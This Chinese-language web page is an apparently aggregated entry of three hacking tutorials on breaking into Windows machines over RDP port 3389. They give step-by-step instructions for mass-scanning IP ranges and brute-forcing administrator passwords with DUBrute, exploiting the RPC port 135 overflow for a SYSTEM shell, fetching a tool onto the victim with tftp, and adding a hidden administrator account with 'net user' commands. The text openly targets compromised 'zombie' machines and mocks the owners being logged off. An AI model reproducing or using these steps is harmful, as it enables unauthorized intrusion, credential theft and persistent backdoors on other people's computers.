包含3389渗透工具的词条

导航：

• 1、如何利用3389端口攻破服务器
• 2、我和朋友练习最简单的3389端口入侵，他win2003，我win xp 都开了3389，都无密码，怎样才能最迅速的搞定他
• 3、远程电脑3389端口入侵＋工具

如何利用3389端口攻破服务器

第一步：使用工具Dubrute中的Ipseacher进行搜索一些活跃的IP段，当然也会采用百度搜索的方法进行；接着就采用SYN扫描为了达到好的效果都会在server2003系统下进行扫描，只有在该系统下不能正常扫描的时候才会使用vmware虚拟机进行扫描；另外如果在XP系统下进行扫描的时候，他们往往会让先让XP能支持SYN的扫描，方法就是将支持这种扫描的补丁直接复制粘贴到系统盘下的driver，当电脑进行重启后就能进行扫描了。

第二步：将Ipseach下的IP段进行直接复制到SYN扫描器下的ip.txt中，当进行扫描一段时间后就能生出ips文档而这种ips文档IP事实上就是用户开启3389端口的实际IP；顺便业内专家也将dubrute工具中的英文操作给大家翻译下，能够帮助大家更好进行理解；source代表就为源、bad代表的酒味坏的、good代表的就是好的、error代表的就是错误的、check代表的就是检测、thread代表的就是线程、start代表的就是开始、config代表的就是配置、generation代表的就是生成、about代表的就是关于。

第三步：将直接导入需要攻破的3389IP地址，接着还会打开generation在打开后就能看到有3列需要进行手动输入的框，在第一列框中手动填写的就是需要攻破的服务器IP，而第二列框中填写的就是相关登陆账号一般就是administrator，在第三列中就是导入的3389密码字典，当点击male退出界面后，就能再点击config进行配置了。

第四步：当全部完成后就能点击start进行攻破了，这个时候在good后就会出现相关数字这就能代表攻破了多少数量的服务器，界面中的bad就代表正在check中当在dubrute下找到good文档进行打开，就能轻松查看到攻破服务器的登录账号和密码了。

第五步：依次点击电脑开始—运行项目，并在弹出框内输入mstsc-admin指令就能顺利进入3389登陆框，当输入IP连接上再输入账号密码就能直接登录成功了。

我和朋友练习最简单的3389端口入侵，他win2003，我win xp 都开了3389，都无密码，怎样才能最迅速的搞定他

一直似乎是牢不可破的。以前也有过一些关于windows xp的溢出但是基本没人成功过。一直到了最近闹的沸沸扬扬的Microsoft RPC接口远程任意代码可执行漏洞才打破了这个神话。但是对于windows xp这个系统我个人认为安全系数还是比较高的。推荐个人使用。

今天我主要要为大家讲的是windows xp的Terminal Services服务。该服务使用的端口是tcp 3389端口。所以开Terminal Services服务的肉鸡大家就习惯管他叫3389鸡。想必大家都玩过win2k的3389吧？但是我最近去了一些论坛有很多人说windows xp的Terminal Services和windows 2000的是一样的。具我的多次实验发现windows xp的3389和windows 2000的3389根本不是一样的而且差的很多。下面我就为大家详细讲解一下windows xp的3389。首先要想清楚看见windows xp的3389就要先开启windows xp的3389。我在网上发现了一个针对开启windows xp3389的小工具。具我多次实验100%可以成功。该工具的名字为

xp3389.exe而且使用也非常简便。直接上传到肉鸡上执行就可以了。由于xp的ipc$默认只是guest权限。用ipc$的思路上传文件是绝对错误的。我归纳出上传文件的方法有两种：

1 利用tftp上传（tftp大家都很熟悉吧？以前提到过N次在这里我就不详细说了）

2 利用ftp来上传

首先我先用时下比较前卫的漏洞135端口的rpc漏洞溢出一台windows xp主机详细看下图：

OK。一举成功。拿到了一个system权限的shell.然后用tftp上传xp3389.exe命令为tftp –I ip get xp3389.exe看下图：

OK上传完毕。然后直接在肉鸡执行就可以了。看下图：

执行完毕以后就成功开启了3389服务。（该程序最大的好处就是执行以后不需要肉鸡重新启动就可以直接登陆。）

对了还有一个问题我要先象大家交代要想登陆xp的3389必须要使用系统没占用的帐号。也就是现在没有正被使用的帐号权限必须还需要是administrators组的。

Guest组是不可以的。我在肉鸡又执行了两条命令分别是：

Net user zihuan ziHUAN /add

Net localgroup administrators zihuan /add

相信大家都能看懂我在肉鸡上建立了一个管理员权限的用户为:zihuan密码为：ziHUAN。

建立好以后直接用远程桌面连接登陆看下图：

然后输入刚才建立的用户和密码登陆看下图：

OK一个完美的xp桌面。是不是非常爽啊？不过你先别高兴。我说了xp的3389和win2k的不一样。不一样的地方有几下几点：

1 你登陆上xp的3389以后该主机原来正在登陆的帐号会自动注销，也就是说xp只支持一个用户登陆。你登陆上去以后漏洞主机的主人就会掉下来：）如果肉鸡的主人发现他掉了下来在登陆的话你就会掉下来：）

2 在你登陆上xp3389肉鸡的主人会收到一条信息。但是如果你动作足够快的话……嘿嘿。

3 登陆上xp3389会把远程的主机的声音带到本地。你可不要害怕哦。解决的办法是把远程桌面连接的远程计算机声音选到留在远程主机看下图：

以上就是针对xp3389的一些思路。希望对光大黑迷以后hacking的时候能有所帮助。根据我测试还发现xp3389.exe还可以开启windows server 2003的3389由于篇幅原因我在这里就不给大家多介绍了。

xp3389.exe可以开启xp的终端。

传到肉鸡上直接运行即可。不需要重新启动。

远程电脑3389端口入侵＋工具

其实告诉你也没用 你不可能守在这里等...现在的都是动态IP

你去用S扫描器去扫描好了 如果是XP用户 命令是这样的

在CMD下 先到S的盘符下... s tcp IP地址 空格 IP地址 端口号 线成数(1000就行) /save(存在目录下的IP地址)

至于工具嘛 在 开始--程序--附件--通讯--远程桌面连接...打上IP就行了

3389现在很垃圾

用户名:administrator

密码 :空的 很累人啊